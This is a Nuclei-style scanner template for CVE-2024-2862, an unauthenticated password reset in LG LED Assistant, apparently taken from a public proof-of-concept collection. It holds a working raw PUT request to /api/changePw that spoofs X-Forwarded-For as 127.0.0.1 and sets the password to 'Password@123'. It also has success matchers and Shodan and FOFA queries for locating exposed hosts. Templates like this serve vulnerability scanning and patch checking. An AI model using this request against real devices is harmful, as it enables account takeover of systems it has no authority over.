The /api/changePw endpoint in LG LED Assistant allows unauthenticated password resets when requests are considered to come from localhost. An attacker can spoof the X-Forwarded-For header with value 127.0.0.1 to trigger the behavior and receive a success response.
PoC代码[已公开]
id: CVE-2024-2862
info:
name: LG LED Assistant - Unauthenticated Password Reset
author: beginee
severity: high
description: |
The /api/changePw endpoint in LG LED Assistant allows unauthenticated password resets when requests are considered to come from localhost. An attacker can spoof the X-Forwarded-For header with value 127.0.0.1 to trigger the behavior and receive a success response.
impact: |
Attackers can reset passwords of anonymous users, potentially leading to unauthorized access and account takeover.
remediation: |
Apply the latest security patches or update to the newest version of LG LED Assistant.
reference:
- https://lgsecurity.lge.com/bulletins/idproducts#updateDetails
- https://www.tenable.com/security/research/tra-2024-08
- https://nvd.nist.gov/vuln/detail/CVE-2024-2862
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-2862
epss-score: 0.83275
epss-percentile: 0.9924
cwe-id: CWE-640
metadata:
verified: true
max-request: 1
shodan-query: http.title:"LG LED Assistant"
fofa-query: icon_hash="195291629"
tags: cve,cve2024,lg,password,reset,lg
variables:
new_password: "Password@123"
http:
- raw:
- |
PUT /api/changePw HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: 127.0.0.1
User-Agent: test
Content-Type: application/x-www-form-urlencoded
newPw={{new_password}}&hostName={{hostname}}&to=to&user={{username}}&from=from
matchers:
- type: dsl
dsl:
- 'contains(body, "{\"resCode\":\"SUCCESS\"}")'
- 'status_code == 200'
condition: and
# digest: 4b0a0048304602210080b5ee0237e45a100759cd11f238b6bf9b2bfac56c6a539a122ede582a0a5f32022100a8f22623f001be36680eacc5384df4285ccb7529a22698f3b8edbf89af1c14f3:922c64590222798bb761d5b6d8e72950